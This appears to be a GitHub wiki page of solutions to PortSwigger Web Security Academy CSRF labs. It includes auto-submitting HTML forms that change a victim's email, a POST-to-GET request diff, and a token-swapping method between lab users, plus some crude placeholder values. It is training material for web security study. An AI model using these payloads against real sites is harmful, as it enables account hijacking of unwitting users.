-
Notifications
You must be signed in to change notification settings - Fork 0
Cross site request forgery (CSRF)
Alnoman Kamil edited this page Nov 23, 2024
·
9 revisions
Apprentice lab:
CSRF vulnerability with no defenses
Apprentice lab:
CSRF vulnerability with no defenses
-
Solution
- Identify a functionality that can be triggered
/change-emaillooks vulnerable. - Export request to https://tools.nakanosec.com/csrf/.
JavaScript is added to cause the submit button to be pressed automatically.
<html> <body> <form method="POST" action="https://0af700fc04e3d9c18277cefb001400fb.web-security-academy.net/my-account/change-email"> <input type="hidden" name="email" value="[email protected]"/> <input type="submit" value="Submit"> <script> document.forms[0].submit(); </script> </form> </body> <html>
- Identify a functionality that can be triggered
Practitioner lab:
CSRF where token validation depends on request method
Practitioner lab:
CSRF where token validation depends on request method
-
Solution
- Think of an action that the victim would not want to do by accident.
/change-emailwould be one of that. -
Duplicate the POST request of
/change-emailand then change the method from POST to GET. Notice the request structure changes accordingly.--- POSTrequest.txt 2024-11-08 02:38:52 +++ GETrequest.txt 2024-11-08 02:43:41 @@ -1,10 +1,10 @@ -POST https://0ade007003060670815ca228002e0017.web-security-academy.net/my-account/change-email HTTP/2.0 +GET https://0ade007003060670815ca228002e0017.web-security-academy.net/my-account/change-email?email=fuck%40you.taha&csrf=fuck HTTP/2.0 user-agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:132.0) Gecko/20100101 Firefox/132.0 accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 accept-language: en-US,en;q=0.5 accept-encoding: gzip, deflate, br, zstd content-type: application/x-www-form-urlencoded -content-length: 59 +content-length: 0 origin: https://0ade007003060670815ca228002e0017.web-security-academy.net referer: https://0ade007003060670815ca228002e0017.web-security-academy.net/my-account?id=wiener cookie: session=EgpluRHe7PaskInbNTZIz7lIHmL4WLI8 \ No newline at end of file @@ -16,4 +16,3 @@ priority: u=0, i te: trailers -email=fuck%40you.taha&csrf=GpriFZmJJnE0GTySsTN3OWtxq70qc0CJ \ No newline at end of file
- When replaying the GET request with the changed csrf, the status code of the response is
302 FOUND. - Ex4port the raw_request to a file and create a poc at https://tools.nakanosec.com/csrf/.
- Make sure to add an auto-submit script.
document.forms[0].submit();
- Finally the payload.
<html> <body> <form method="GET" action="https://0ade007003060670815ca228002e0017.web-security-academy.net/my-account/[email protected]&csrf=sex"> <input type="hidden" name="email" value="[email protected]"/> <input type="hidden" name="csrf" value="sex"/> <input type="submit" value="Submit"> <script> document.forms[0].submit(); </script> </form> </body> <html>
Note: make sure you play with the email addresses in the lab because sometimes the payload doesn't work if it's your own or vice versa.
- Think of an action that the victim would not want to do by accident.
Practitioner lab:
CSRF where token validation depends on token being present
Practitioner lab:
CSRF where token validation depends on token being present
-
Solution
- Log in as
wiener:peter. - Delete the csrf token and test if request valid.
- Go to online csrf poc site and make adjustments and correct any mistakes. Usually incorrect url, %40 has to be @ and auto-submit script.
- Deliver payload to victim.
- Log in as
Practitioner lab:
CSRF where token is not tied to user session
Practitioner lab:
CSRF where token is not tied to user session
-
Solution
- Log in as
carlos:montoya. -
Intercept on, and press
change-emailwith a random email as input. - Copy the generated csrf from carlos and X kill the flow.
- Log out of
calors:montoyaand log in aswiener:peter. - Export x4 the raw http request to a file and generate a csrf POC, with the one obtained from
carlos:montoya. - Store and deliver exploit to victim. Lab is solved suggesting that the csrf token is not tied to the user session.
- Log in as
Practitioner lab:
SameSite Strict bypass via sibling domain (Pro)
Practitioner lab:
SameSite Strict bypass via sibling domain (Pro)
Solutions for the Portswigger's Web Security Academy using mitmproxy and other cli tools instead of Burp Suite
Server-side topics:
- SQL injection
- Authentication
- File path traversal
- OS command injection
- Business logic vulnerabilities
- Information disclosure
- Access control vulnerabilities
- File upload vulnerabilities
- Race conditions
- Server-side request forgery (SSRF)
- XML external entity (XXE) injection
- NoSQL injection
- API testing
- Web cache deception
Client-side topics:
- Cross-site scripting (XSS)
- Cross-site request forgery (CSRF)
- Cross-origin resource sharing (CORS)
- Clickjacking
- DOM-based vulnerabilities
- WebSockets
Advanced topics: